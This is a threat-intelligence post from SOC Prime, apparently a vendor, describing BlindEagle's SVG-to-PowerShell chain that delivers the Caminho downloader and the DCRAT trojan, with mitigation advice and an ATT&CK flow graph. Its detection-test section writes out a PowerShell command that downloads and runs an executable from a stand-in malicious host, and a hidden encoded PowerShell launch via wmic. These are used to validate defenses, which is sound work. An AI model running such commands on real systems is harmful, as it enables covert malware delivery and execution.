SOC Prime Bias: Critical

17 Dec 2025 17:04
newspaper icon BlindEagle Targets Colombian Insurance Sector with BlotchyQuasar Read post

BlindEagle Targets Colombian Government Agency with Caminho and DCRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
BlindEagle Targets Colombian Government Agency with Caminho and DCRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

BlindEagle ran a spear-phishing operation targeting a Colombian government agency, delivering a weaponized SVG attachment that initiated a JavaScript-to-PowerShell execution chain. That sequence pulled down a downloader dubbed Caminho, which then fetched the open-source DCRAT remote access trojan hosted on Discord. The final stage used process hollowing into MSBuild.exe and applied multiple evasion methods to reduce detection.

Investigation

Zscaler ThreatLabz analyzed the infection flow and reported an SVG smuggling approach, several tiers of obfuscated JavaScript, a WMI-triggered PowerShell command, and Caminho delivery through a Discord-hosted URL. The investigation also associated the supporting infrastructure with Swedish IP addresses and a dynamic DNS provider (ydns.eu).

Mitigation

Apply tighter controls for inbound email attachments—especially SVG content—and enforce content disarm/inspection for embedded scripts. Use web proxy policies to restrict access to suspicious file-hosting endpoints, including Discord file URLs used for malware delivery. Monitor for unusual PowerShell and WMI execution patterns, and enforce application allowlisting policies covering MSBuild.exe usage.

Response

Response

Trigger alerts for the malicious SVG artifact, the referenced JavaScript filename, and downloads reaching the Discord URL. Hunt for in-memory or on-disk traces of Caminho and DCRAT, evidence of MSBuild.exe process hollowing, and persistence via registry changes or scheduled tasks. Quarantine impacted endpoints and block the identified C2 domain.

"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 %% Nodes initial_access_phishing["<b>Action</b> – <b>T1566.001 Phishing Attachment</b><br/>SVG attachment in email"] class initial_access_phishing action user_exec_malicious_link["<b>Action</b> – <b>T1204.001 User Execution</b><br/>Click malicious SVG image"] class user_exec_malicious_link action user_exec_malicious_file["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Open JavaScript file"] class user_exec_malicious_file action obfuscation_svg_smuggling["<b>Technique</b> – <b>T1027.017</b><br/>SVG smuggling to hide script"] class obfuscation_svg_smuggling technique obfuscation_embedded_payloads["<b>Technique</b> – <b>T1027.009</b><br/>Base64 encoded JavaScript payloads"] class obfuscation_embedded_payloads technique command_js["<b>Technique</b> – <b>T1059.007 JavaScript</b><br/>Deobfuscation scripts"] class command_js technique command_powershell["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/>WMI Create to run PowerShell"] class command_powershell technique event_wmi_subscription["<b>Technique</b> – <b>T1546.003</b><br/>WMI event subscription execution"] class event_wmi_subscription technique obfuscation_steganography["<b>Technique</b> – <b>T1027.003</b><br/>Payload hidden in PNG image"] class obfuscation_steganography technique reflective_code_loading["<b>Technique</b> – <b>T1620</b><br/>Reflective .NET assembly loading"] class reflective_code_loading technique process_hollowing["<b>Technique</b> – <b>T1055.012</b><br/>MsBuild hollowing"] class process_hollowing technique downloader_caminho["<b>Tool</b> – <b>Name</b>: Caminho downloader<br/><b>Purpose</b>: Fetch DCRAT"] class downloader_caminho tool malware_dcrat["<b>Malware</b> – <b>Name</b>: DCRAT"] class malware_dcrat malware amsi_bypass["<b>Technique</b> – <b>T1027.005</b><br/>Patch AMSI to bypass detection"] class amsi_bypass technique persistence_run_key["<b>Technique</b> – <b>T1547.001</b><br/>Create Run key in registry"] class persistence_run_key technique persistence_scheduled_task["<b>Technique</b> – <b>T1053</b><br/>Create scheduled task"] class persistence_scheduled_task technique c2_discord["<b>Command & Control</b> – Discord URL used for payload distribution"] class c2_discord technique %% Connections initial_access_phishing –>|leads_to| user_exec_malicious_link user_exec_malicious_link –>|leads_to| user_exec_malicious_file user_exec_malicious_file –>|leads_to| obfuscation_svg_smuggling obfuscation_svg_smuggling –>|leads_to| obfuscation_embedded_payloads obfuscation_embedded_payloads –>|leads_to| command_js command_js –>|leads_to| command_powershell command_powershell –>|leads_to| event_wmi_subscription event_wmi_subscription –>|leads_to| obfuscation_steganography obfuscation_steganography –>|leads_to| reflective_code_loading reflective_code_loading –>|leads_to| process_hollowing process_hollowing –>|leads_to| downloader_caminho downloader_caminho –>|downloads| malware_dcrat malware_dcrat –>|performs| amsi_bypass malware_dcrat –>|establishes| persistence_run_key malware_dcrat –>|establishes| persistence_scheduled_task malware_dcrat –>|uses| c2_discord "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The threat actor (BlindEagle) uses WMI to spawn a PowerShell process that downloads the “Caminho” payload from a remote C2 server and executes it in memory. By leveraging wmic.exe with the process call create method, the attacker can run PowerShell without interacting with a user session, making the activity stealthy. The command line contains the literal word “powershell”, which satisfies the detection rule’s condition.

    1. Stage 1 – Prepare the malicious PowerShell one‑liner:

      $url = "http://malicious.example.com/caminho.exe"
$out = "$env:TEMPcaminho.exe"
Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out

    2. Stage 2 – Execute via WMI:

      $psCmd = 'powershell -nop -w hidden -enc <base64-encoded-payload>'
wmic process call create "$psCmd"

    The presence of powershell in the CommandLine field of the Sysmon Event 1 generated by the wmic child process will trigger the rule.

  • Regression Test Script:

    # BlindEagle PowerShell via WMI simulation
# ----------------------------------------------------------------------
# 1. Define malicious payload (for test we use a benign echo command)
$payload = 'Write-Host "Simulated Caminho execution"'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# 2. Build the PowerShell command line that includes the literal word "powershell"
$psCommand = "powershell -NoProfile -EncodedCommand $encoded"

# 3. Launch the command via WMI (wmic) to generate a Sysmon EventID 1
$wmicCommand = "wmic process call create `"$psCommand`""
Write-Host "Executing via WMI: $wmicCommand"
Invoke-Expression $wmicCommand

# 4. Optional: Log to console for verification
Write-Host "Simulation complete. Verify detection in SIEM."

  • Cleanup Commands:

    # Remove any temporary files (none created in this simulation)
# Kill any lingering wmic or PowerShell processes started for the test
Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free